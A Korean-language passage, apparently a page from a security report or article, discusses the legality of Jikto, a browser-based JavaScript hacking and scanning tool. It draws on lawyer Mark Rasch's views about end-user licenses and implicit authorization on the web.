행위를 규제한다. Jikto의 제작은 이 법규 에 독창적인 방법으로 도전한다. 범죄자들은 호프만의 Jikto 코드의 GUI를 변경해 사용자 브 라우저상에서 조용히 실행하게 할 수 있다. Jikto는 Joe의 웹사이트 방문자의 시스템만 해킹하 는 것이 아니라, Joe의 브라우저도 제어할 수 있다. Joe가 Jikto로 하여금 그런 행위를 하는 것을 허용했을까? 이 질문에 대답하기는 어렵다고 Mark Rasch 변호사는 말한다. 소프트웨어 구입시 사용자는 소프트웨어를 사용해 무엇을 하는 것이 허용되고 무엇이 허용되지 않았다는 내용을 설명하는 최종-사용자 라이센스에 동의해야 한다. 브라우저를 통해 웹사이트르 볼 때 는 최종-사용자 라이센스에 동의할 필요가 없다. 특정 사이트에 접속하기 위해 최종-사용자 라이센스에 동의하도록 요구받았다 하더라도, Rasch는 그 동의가 사이트 컨텐트 접속만 규정 하지, 사이트 자체를 규정하지는 않는다고 말한다. 웹은 "암묵적인 권한부여"로 실행된다. 사 용자가 브라우저에 자바스크립트 실행을 허용하도록 설정했다면, Jikto를 실행하는 권한도 부 여한 셈이 되는 것이 아닐까? Rasch는 다음과 같은 시나리오를 제시한다: 사용자는 일반적인 브라우징을 하면서 사이트 디렉토리를 열람하고 사용자가 원하는 파일과 폴더를 본다. 사이트 소유자는 사용자가 이런 행위를 하는 것을 의도하지 않았다 하더라도, 그렇게 하지 말 것을 사 용자에게 말하지 않았고 그것을 막기 위한 노력도 하지 않았기 때문에 사용자는 고소당할 염 려가 없다. 이 논리대로라면 침투 테스터들은 Jikto를 사용자 브라우저에서 실행할 권한이 있 다. - 50 -